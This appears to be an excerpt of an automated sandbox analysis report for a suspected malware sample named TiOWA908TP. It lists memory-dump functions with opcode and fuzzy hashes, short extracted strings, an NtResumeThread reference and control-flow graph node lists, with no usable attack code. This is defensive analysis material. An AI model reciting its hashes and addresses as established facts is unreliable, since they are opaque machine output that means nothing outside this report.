                                  • Instruction Fuzzy Hash: A521E4B1D003499FCB10DFAAD984ADEFBF5FF48310F20842AE919A7250C7759944DBA1
                                  Function 059D8230 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtResumeThread.NTDLL(?,?), ref: 059D82A6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: f4482a48a02e8aff785c10fd28a363eab39809e88ba39ab632a806e9d327f198
                                  • Instruction ID: 97c7875a21c4a682ed9fea698cedb756424a40ac3eee2d6dba462664564e6de1
                                  • Opcode Fuzzy Hash: f4482a48a02e8aff785c10fd28a363eab39809e88ba39ab632a806e9d327f198
                                  • Instruction Fuzzy Hash: 791127B1D002098BCB10DFAAC88469EFBF8EF59320F54842AD519A7241CB7459448FA1
                                  Function 059D8238 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtResumeThread.NTDLL(?,?), ref: 059D82A6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID: ResumeThread
                                  • String ID:
                                  • API String ID: 947044025-0
                                  • Opcode ID: 5a6304f5f8841fd0183daedacee2aa15140c72f9f03312a672ef7d0894b45fa1
                                  • Instruction ID: c5d3dba6706a854ff413dba5ef9916949397f59853f78d01a967b600d7273ddc
                                  • Opcode Fuzzy Hash: 5a6304f5f8841fd0183daedacee2aa15140c72f9f03312a672ef7d0894b45fa1
                                  • Instruction Fuzzy Hash: E91117B1D002498FDB10DFAAC88469FFBF8EF99320F54842AD519A7240CB746944CFA1
                                  Function 06CDF9C0 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481610209.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cd0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Djq
                                  • API String ID: 0-3204991199
                                  • Opcode ID: a646d6c86cb8b4f050121a5642829193372c3d8b39de7cb3269a96a356587261
                                  • Instruction ID: 1ec785d9b563cbdf327671e67c2bfa30d588a6b0ff08e64a432a3e26afcfb943
                                  • Opcode Fuzzy Hash: a646d6c86cb8b4f050121a5642829193372c3d8b39de7cb3269a96a356587261
                                  • Instruction Fuzzy Hash: F1D1C074E01219CFDB54DFA9D994A9DBBB2FF89300F1080A9D50AAB365DB34AD81CF50
                                  Function 071CF930 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2483284381.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_71b0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: fQ
                                  • API String ID: 0-3620927468
                                  • Opcode ID: 0b48c4069a358aeb341e4a28f25137ec0f333b2843e193024557dd1596ff1885
                                  • Instruction ID: 599f24fe52887a9c2667e5ee75ff89f1499fe39da0ab486a82988cdd3f61f4e3
                                  • Opcode Fuzzy Hash: 0b48c4069a358aeb341e4a28f25137ec0f333b2843e193024557dd1596ff1885
                                  • Instruction Fuzzy Hash: 0C512CB5A0520ADBCB44CFA9D4846AEFBF6FF89304F149129E505E7354D73899428B90
                                  Function 06CD9263 Relevance: .5, Instructions: 539COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481610209.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cd0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c7f7ecada2622634810112b219f6fbfb5b86a4e52f2d715d4934b9deb333bc6
                                  • Instruction ID: b8f2b9185ba8562c71a2781e1c9dade03e6689d0babd37dbe84b040ae5b7e4c3
                                  • Opcode Fuzzy Hash: 2c7f7ecada2622634810112b219f6fbfb5b86a4e52f2d715d4934b9deb333bc6
                                  • Instruction Fuzzy Hash: 4D52B7B8A046298FCB64DF28CD84B9AB7B6FB49305F1081D9D60DA7355DB30AE85CF50
                                  Function 059D6108 Relevance: .4, Instructions: 429COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b4d39028806c2f48d89195afc05468d9d1c0760e58b78bfe94e2b6fa69247dca
                                  • Instruction ID: 2525e7621aac156bbee61cae54deda5944b9659f2eb6597c8826cec620a3f45d
                                  • Opcode Fuzzy Hash: b4d39028806c2f48d89195afc05468d9d1c0760e58b78bfe94e2b6fa69247dca
                                  • Instruction Fuzzy Hash: 0812D3B4A05218CFDB60CF98D988BADFBB6FB49304F1094AAD509A7345D77859C5CF20
                                  Function 059D60F8 Relevance: .4, Instructions: 406COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b61e731fbddcedfa7ff3e230f650bc0460cbb39ae53af05012faa4187e349d5
                                  • Instruction ID: c3524eed838dd5e0169b971948bd1e1e29ecf11ca365a676fddeb8d1c156e25c
                                  • Opcode Fuzzy Hash: 3b61e731fbddcedfa7ff3e230f650bc0460cbb39ae53af05012faa4187e349d5
                                  • Instruction Fuzzy Hash: 1612E3B4E05218CFDB60CFA8D988BADFBB6FB49304F1494AAD409A7345D7785985CF20
                                  Function 059D6838 Relevance: .4, Instructions: 373COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2479609598.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_59d0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 046ff6c159226da9eff0b10ecad103a8c29e177b996b1e47f1d553fd09f4c570
                                  • Instruction ID: 28afc28105f7177eefc8cb258fc87daed190b792168cd05d9d13f121c48ed1a1
                                  • Opcode Fuzzy Hash: 046ff6c159226da9eff0b10ecad103a8c29e177b996b1e47f1d553fd09f4c570
                                  • Instruction Fuzzy Hash: E302D2B4A05218CFDB60CFA8D988BADFBB6FB49304F1494AAD409A7345D77859C5CF20
                                  Function 06E333C0 Relevance: .3, Instructions: 298COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: dfd6c02cf86fda5fd498736685dbe386a9fde0ab0ba23f158a4dd597a2e8cefd
                                  • Instruction ID: 1dce050be9c68c64619858f4d6998fc80e7ce8cffbf5cd8d6eaae79a4c205a02
                                  • Opcode Fuzzy Hash: dfd6c02cf86fda5fd498736685dbe386a9fde0ab0ba23f158a4dd597a2e8cefd
                                  • Instruction Fuzzy Hash: 8EC1B0B4D053A9CEEB90CF99D08CBEEBBB1FB46314F50A069D425A7291C7784985CF81
                                  Function 0708B598 Relevance: .3, Instructions: 271COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482983111.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7080000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f08aee2c2c97d0c6f8edb03be8769d37a3e256f769fb21c9fe9a93249cfa0ebf
                                  • Instruction ID: 43a36048913cbcdadce170a60759b9c0cc534247814a454fc248e73d3c2b4a8b
                                  • Opcode Fuzzy Hash: f08aee2c2c97d0c6f8edb03be8769d37a3e256f769fb21c9fe9a93249cfa0ebf
                                  • Instruction Fuzzy Hash: 0DC1F2B4A06208CFDB94DF69D894BADBBF2FB89300F109269D459A7385DB345D85CF00
                                  Function 0708B5A8 Relevance: .3, Instructions: 269COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482983111.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7080000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ef021252dc3ea5e34c68ee23a279b420d722027a50a32d61d525d888cf0ccc5e
                                  • Instruction ID: 6eef870ed778b36e17705945fe3e488b08cad5dbdd05c0f2ce33211d762705cc
                                  • Opcode Fuzzy Hash: ef021252dc3ea5e34c68ee23a279b420d722027a50a32d61d525d888cf0ccc5e
                                  • Instruction Fuzzy Hash: 42C1E2B4A06208CFDB94EF69D994BADBBF2FB89300F109269D459A7345DB345D85CF00
                                  Function 07083378 Relevance: .2, Instructions: 211COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482983111.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7080000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1082761c0aaea728a0045c739d4ed61ce8c46c02d27fd0c2363d36a8e5774f5c
                                  • Instruction ID: ba9e8fd2c3f3802fe4742f2c673f6f4c8eae836ff4560c4374cdcd59b8a985ff
                                  • Opcode Fuzzy Hash: 1082761c0aaea728a0045c739d4ed61ce8c46c02d27fd0c2363d36a8e5774f5c
                                  • Instruction Fuzzy Hash: 4A8126B4A05218CFDB94EFA8D888B9DFBF5FB8A304F109169D459A7341DB789985CF00
                                  Function 06FA0040 Relevance: 4.2, Strings: 3, Instructions: 439COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 170 6fa0040-6fa0068 173 6fa006a-6fa00b1 170->173 174 6fa00b6-6fa00c4 170->174 218 6fa050d-6fa0514 173->218 175 6fa00d3 174->175 176 6fa00c6-6fa00d1 174->176 178 6fa00d5-6fa00dc 175->178 176->178 179 6fa00e2-6fa00e6 178->179 180 6fa01c5-6fa01c9 178->180 182 6fa00ec-6fa00f0 179->182 183 6fa0515-6fa053d 179->183 185 6fa01cb-6fa01da 180->185 186 6fa021f-6fa0229 180->186 187 6fa0102-6fa0160 182->187 188 6fa00f2-6fa00fc 182->188 191 6fa0544-6fa056e 183->191 197 6fa01de-6fa01e3 185->197 189 6fa022b-6fa023a 186->189 190 6fa0262-6fa0288 186->190 227 6fa05d3-6fa05e8 187->227 228 6fa0166-6fa01c0 187->228 188->187 188->191 202 6fa0240-6fa025d 189->202 203 6fa0576-6fa058c 189->203 208 6fa028a-6fa0293 190->208 209 6fa0295 190->209 191->203 204 6fa01dc 197->204 205 6fa01e5-6fa021a 197->205 202->218 225 6fa0594-6fa05cc 203->225 204->197 205->218 216 6fa0297-6fa02bf 208->216 209->216 231 6fa0390-6fa0394 216->231 232 6fa02c5-6fa02de 216->232 225->227 228->218 235 6fa040e-6fa0418 231->235 236 6fa0396-6fa03af 231->236 232->231 254 6fa02e4-6fa02f3 232->254 239 6fa041a-6fa0424 235->239 240 6fa0475-6fa047e 235->240 236->235 257 6fa03b1-6fa03c0 236->257 252 6fa042a-6fa043c 239->252 253 6fa0426-6fa0428 239->253 243 6fa0480-6fa04ae 240->243 244 6fa04b6-6fa0503 240->244 243->244 264 6fa050b 244->264 258 6fa043e-6fa0440 252->258 253->258 265 6fa030b-6fa0320 254->265 266 6fa02f5-6fa02fb 254->266 277 6fa03d8-6fa03e3 257->277 278 6fa03c2-6fa03c8 257->278 262 6fa046e-6fa0473 258->262 263 6fa0442-6fa0446 258->263 262->239 262->240 268 6fa0448-6fa0461 263->268 269 6fa0464-6fa0467 263->269 264->218 275 6fa0322-6fa034e 265->275 276 6fa0354-6fa035d 265->276 271 6fa02ff-6fa0301 266->271 272 6fa02fd 266->272 268->269 269->262 271->265 272->265 275->225 275->276 276->227 281 6fa0363-6fa038a 276->281 277->227 279 6fa03e9-6fa040c 277->279 282 6fa03ca 278->282 283 6fa03cc-6fa03ce 278->283 279->235 279->257 281->231 281->254 282->277 283->277
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Hgq$Hgq$Hgq
                                  • API String ID: 0-3310009463
                                  • Opcode ID: 3feb996031a4f3d8442e66dbc1db90374995a1cac0a7e1a1c355ba6ad4670f76
                                  • Instruction ID: e967e5d45a17ee298e1ed6d19d8ac6c5914376eca81bdb3b3408d00f24b768d8
                                  • Opcode Fuzzy Hash: 3feb996031a4f3d8442e66dbc1db90374995a1cac0a7e1a1c355ba6ad4670f76
                                  • Instruction Fuzzy Hash: A3023A70A00305CFDB65DFA9D894AAEB7B2FF88304F148529D5469B391DB35EC86CB50
                                  Function 06FA1D08 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 6fa1d08-6fa1d45 296 6fa1d67-6fa1d7d call 6fa1b10 294->296 297 6fa1d47-6fa1d4a 294->297 303 6fa20f3-6fa2107 296->303 304 6fa1d83-6fa1d8f 296->304 410 6fa1d4c call 6fa2678 297->410 411 6fa1d4c call 6fa2668 297->411 412 6fa1d4c call 6fa2620 297->412 413 6fa1d4c call 6fa2610 297->413 299 6fa1d52-6fa1d54 299->296 301 6fa1d56-6fa1d5e 299->301 301->296 315 6fa2147-6fa2150 303->315 305 6fa1ec0-6fa1ec7 304->305 306 6fa1d95-6fa1d98 304->306 308 6fa1ecd-6fa1ed6 305->308 309 6fa1ff6-6fa2030 call 6fa1518 305->309 307 6fa1d9b-6fa1da4 306->307 311 6fa1daa-6fa1dbe 307->311 312 6fa21e8 307->312 308->309 314 6fa1edc-6fa1fe8 call 6fa1518 call 6fa1aa8 call 6fa1518 308->314 408 6fa2033 call 6fa44b0 309->408 409 6fa2033 call 6fa44a1 309->409 326 6fa1eb0-6fa1eba 311->326 327 6fa1dc4-6fa1e59 call 6fa1b10 * 2 call 6fa1518 call 6fa1aa8 call 6fa1b50 call 6fa1bf8 call 6fa1c60 311->327 322 6fa21ed-6fa21f1 312->322 405 6fa1fea 314->405 406 6fa1ff3-6fa1ff4 314->406 316 6fa2152-6fa2159 315->316 317 6fa2115-6fa211e 315->317 319 6fa215b-6fa219e call 6fa1518 316->319 320 6fa21a7-6fa21ae 316->320 317->312 323 6fa2124-6fa2136 317->323 319->320 331 6fa21d3-6fa21e6 320->331 332 6fa21b0-6fa21c0 320->332 328 6fa21fc 322->328 329 6fa21f3 322->329 341 6fa2138-6fa213d 323->341 342 6fa2146 323->342 326->305 326->307 385 6fa1e5b-6fa1e73 call 6fa1bf8 call 6fa1518 call 6fa17c8 327->385 386 6fa1e78-6fa1eab call 6fa1c60 327->386 340 6fa21fd 328->340 329->328 331->322 332->331 343 6fa21c2-6fa21ca 332->343 340->340 414 6fa2140 call 6fa4c50 341->414 415 6fa2140 call 6fa4c40 341->415 342->315 343->331 354 6fa2039-6fa20ea call 6fa1518 354->303 385->386 386->326 405->406 406->309 408->354 409->354 410->299 411->299 412->299 413->299 414->342 415->342
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'cq$4'cq$4'cq
                                  • API String ID: 0-1854722736
                                  • Opcode ID: a193f4339da61b814595d5aa408fc2d36925a60c80b3c236713d71beb42dd050
                                  • Instruction ID: 737ae415043c90ef6431cf7438289170557dda02034d97979f3c4310dcf6558f
                                  • Opcode Fuzzy Hash: a193f4339da61b814595d5aa408fc2d36925a60c80b3c236713d71beb42dd050
                                  • Instruction Fuzzy Hash: 32F1EC74B00218DFDB48DFA4D998A9DB7B2FF88300F158159E906AB3A5DB71EC46CB50
                                  Function 06FA62E0 Relevance: 4.1, Strings: 3, Instructions: 364COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 416 6fa62e0-6fa62f0 417 6fa6409-6fa642e 416->417 418 6fa62f6-6fa62fa 416->418 420 6fa6435-6fa645a 417->420 419 6fa6300-6fa6309 418->419 418->420 421 6fa630f-6fa6336 419->421 422 6fa6461-6fa6497 419->422 420->422 432 6fa63fe-6fa6408 421->432 433 6fa633c-6fa633e 421->433 439 6fa649e-6fa64aa 422->439 435 6fa635f-6fa6361 433->435 436 6fa6340-6fa6343 433->436 440 6fa6364-6fa6368 435->440 438 6fa6349-6fa6353 436->438 436->439 438->439 441 6fa6359-6fa635d 438->441 447 6fa64ac-6fa64b1 439->447 448 6fa64b2 439->448 443 6fa636a-6fa6379 440->443 444 6fa63c9-6fa63d5 440->444 441->435 441->440 443->439 453 6fa637f-6fa63c6 443->453 444->439 445 6fa63db-6fa63f8 444->445 445->432 445->433 447->448 450 6fa64ba-6fa64bd 448->450 451 6fa64b4-6fa64b6 448->451 455 6fa64be-6fa64f4 450->455 454 6fa64b8-6fa64b9 451->454 451->455 453->444 454->450 463 6fa6518-6fa652f 455->463 464 6fa64f6-6fa650a 455->464 471 6fa6620-6fa6630 463->471 472 6fa6535-6fa661b call 6fa1b10 call 6fa1518 * 2 call 6fa1b50 call 6fa5318 call 6fa1518 call 6fa44b0 call 6fa23b8 463->472 537 6fa650d call 6fa6b58 464->537 538 6fa650d call 6fa69f8 464->538 470 6fa6513 473 6fa6743-6fa674e 470->473 481 6fa671e-6fa673a call 6fa1518 471->481 482 6fa6636-6fa6710 call 6fa1b10 * 2 call 6fa22c8 call 6fa1518 * 2 call 6fa17c8 call 6fa1c60 call 6fa1518 471->482 472->471 478 6fa677d-6fa679e call 6fa1c60 473->478 479 6fa6750-6fa6760 473->479 491 6fa6762-6fa6768 479->491 492 6fa6770-6fa6778 call 6fa23b8 479->492 481->473 534 6fa671b 482->534 535 6fa6712 482->535 491->492 492->478 534->481 535->534 537->470 538->470
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482528632.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$(gq$Hgq
                                  • API String ID: 0-3837630004
                                  • Opcode ID: 31056392f1c1eb93c526d31e7af68c98f67671adaf45a8c7862a774fd01ecae7
                                  • Instruction ID: 5559544df44e0108e11393c84b8847f06ca3519e34eb8c2278a601bea95c545b
                                  • Opcode Fuzzy Hash: 31056392f1c1eb93c526d31e7af68c98f67671adaf45a8c7862a774fd01ecae7
                                  • Instruction Fuzzy Hash: 50E15674A00209DFCB55EF68D89499DBBB2FF89300F158569E4069B3A5DF30ED85CB90
                                  Function 06E3DE78 Relevance: 4.0, Strings: 3, Instructions: 201COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 539 6e3de78-6e3de8a 540 6e3dec2-6e3dee7 539->540 541 6e3de8c-6e3deac 539->541 548 6e3deee-6e3df42 540->548 541->548 549 6e3deae-6e3debf 541->549 555 6e3dfe9-6e3e01a 548->555 556 6e3df48-6e3df54 548->556 568 6e3e022 555->568 569 6e3e01c-6e3e021 555->569 559 6e3df56-6e3df5d 556->559 560 6e3df5e-6e3df72 556->560 563 6e3dfe1-6e3dfe8 560->563 564 6e3df74-6e3df84 560->564 570 6e3df8a-6e3df99 564->570 571 6e3e024-6e3e029 568->571 572 6e3e02a-6e3e037 568->572 569->568 579 6e3df9b-6e3dfb5 570->579 580 6e3dfdc-6e3dfdf 570->580 571->572 573 6e3e067-6e3e06d 572->573 574 6e3e039-6e3e05d 572->574 576 6e3e07f-6e3e08e 573->576 577 6e3e06f-6e3e07c 573->577 574->573 575 6e3e05f 574->575 575->573 579->580 582 6e3dfb7-6e3dfc0 579->582 580->563 580->564 583 6e3dfc2-6e3dfc5 582->583 584 6e3dfcf-6e3dfdb 582->584 583->584
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2482418539.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6e30000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: (gq$(gq$(gq
                                  • API String ID: 0-3964246382
                                  • Opcode ID: 9a6726fb11dcef591bad0d9f3f5f557194f943de9365e3c7002f0ef7a3fb0815
                                  • Instruction ID: 7f57c139b8e6c350cfd7baa686e797d78ce4d18b44787f43d248f18299e6704a
                                  • Opcode Fuzzy Hash: 9a6726fb11dcef591bad0d9f3f5f557194f943de9365e3c7002f0ef7a3fb0815
                                  • Instruction Fuzzy Hash: 6F5141327042654FC755DF6DD844AAE7BE6EFC5624B2884AAE409CB392DF35DC02C7A0
                                  Function 06CF36E8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481665191.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cf0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'cq$4'cq
                                  • API String ID: 0-60795322
                                  • Opcode ID: aa24a33769269408130cf94eee261fac4939b8ccaca6c4a0599d95130a78d64e
                                  • Instruction ID: 329444f4738adf95e1d3e8f5782a959d7928beba7a74f06627d4a7ca2aa48441
                                  • Opcode Fuzzy Hash: aa24a33769269408130cf94eee261fac4939b8ccaca6c4a0599d95130a78d64e
                                  • Instruction Fuzzy Hash: 6442E674E24249EFEF95DBA6C558AADB7B2FF44300F10801AD616A7394CB345D86CF90
                                  Function 06CF4210 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1358 6cf4210-6cf4238 1359 6cf423f-6cf4268 1358->1359 1360 6cf423a 1358->1360 1361 6cf426a-6cf4273 1359->1361 1362 6cf4289 1359->1362 1360->1359 1363 6cf427a-6cf427d 1361->1363 1364 6cf4275-6cf4278 1361->1364 1365 6cf428c-6cf4290 1362->1365 1366 6cf4287 1363->1366 1364->1366 1367 6cf4647-6cf465e 1365->1367 1366->1365 1369 6cf4295-6cf4299 1367->1369 1370 6cf4664-6cf4668 1367->1370 1371 6cf429e-6cf42a2 1369->1371 1372 6cf429b-6cf42f8 1369->1372 1373 6cf469d-6cf46a1 1370->1373 1374 6cf466a-6cf469a 1370->1374 1376 6cf42cb-6cf42ef 1371->1376 1377 6cf42a4-6cf42c8 1371->1377 1384 6cf42fd-6cf4301 1372->1384 1385 6cf42fa-6cf436b 1372->1385 1378 6cf46a3-6cf46ac 1373->1378 1379 6cf46c2 1373->1379 1374->1373 1376->1367 1377->1376 1380 6cf46ae-6cf46b1 1378->1380 1381 6cf46b3-6cf46b6 1378->1381 1382 6cf46c5-6cf46cb 1379->1382 1390 6cf46c0 1380->1390 1381->1390 1387 6cf432a-6cf433b 1384->1387 1388 6cf4303-6cf4327 1384->1388 1392 6cf436d-6cf43ca 1385->1392 1393 6cf4370-6cf4374 1385->1393 1412 6cf4344-6cf4351 1387->1412 1388->1387 1390->1382 1402 6cf43cf-6cf43d3 1392->1402 1403 6cf43cc-6cf4428 1392->1403 1396 6cf439d-6cf43c1 1393->1396 1397 6cf4376-6cf439a 1393->1397 1396->1367 1397->1396 1406 6cf43fc-6cf441f 1402->1406 1407 6cf43d5-6cf43f9 1402->1407 1415 6cf442d-6cf4431 1403->1415 1416 6cf442a-6cf448c 1403->1416 1406->1367 1407->1406 1413 6cf4353-6cf4359 1412->1413 1414 6cf4361-6cf4362 1412->1414 1413->1414 1414->1367 1418 6cf445a-6cf4472 1415->1418 1419 6cf4433-6cf4457 1415->1419 1425 6cf448e-6cf44f0 1416->1425 1426 6cf4491-6cf4495 1416->1426 1435 6cf4474-6cf447a 1418->1435 1436 6cf4482-6cf4483 1418->1436 1419->1418 1437 6cf44f5-6cf44f9 1425->1437 1438 6cf44f2-6cf4554 1425->1438 1428 6cf44be-6cf44d6 1426->1428 1429 6cf4497-6cf44bb 1426->1429 1446 6cf44d8-6cf44de 1428->1446 1447 6cf44e6-6cf44e7 1428->1447 1429->1428 1435->1436 1436->1367 1440 6cf44fb-6cf451f 1437->1440 1441 6cf4522-6cf453a 1437->1441 1448 6cf4559-6cf455d 1438->1448 1449 6cf4556-6cf45b8 1438->1449 1440->1441 1457 6cf453c-6cf4542 1441->1457 1458 6cf454a-6cf454b 1441->1458 1446->1447 1447->1367 1451 6cf455f-6cf4583 1448->1451 1452 6cf4586-6cf459e 1448->1452 1459 6cf45bd-6cf45c1 1449->1459 1460 6cf45ba-6cf4613 1449->1460 1451->1452 1468 6cf45ae-6cf45af 1452->1468 1469 6cf45a0-6cf45a6 1452->1469 1457->1458 1458->1367 1462 6cf45ea-6cf460d 1459->1462 1463 6cf45c3-6cf45e7 1459->1463 1470 6cf463c-6cf463f 1460->1470 1471 6cf4615-6cf4639 1460->1471 1462->1367 1463->1462 1468->1367 1469->1468 1470->1367 1471->1470
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2481665191.0000000006CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6cf0000_TiOWA908TP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4'cq$4'cq
                                  • API String ID: 0-60795322
                                  • Opcode ID: df030b69bce23e5e7e17a9e0246d1aa9ab2449d8d73c234e8edd8e7c4038c15c
                                  • Instruction ID: 6822ffe450b2e5a3ab055912b1eabab090a18b589f024dc9e5d3eb2bbf2228a3
                                  • Opcode Fuzzy Hash: df030b69bce23e5e7e17a9e0246d1aa9ab2449d8d73c234e8edd8e7c4038c15c
                                  • Instruction Fuzzy Hash: 1FF1F770D15208DFDBA8DFA9E4886ADBBF2FF49315F208429E506A7391CB355989CF40
                                  Function 06E3F260 Relevance: 2.9, Strings: 2, Instructions: 358COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
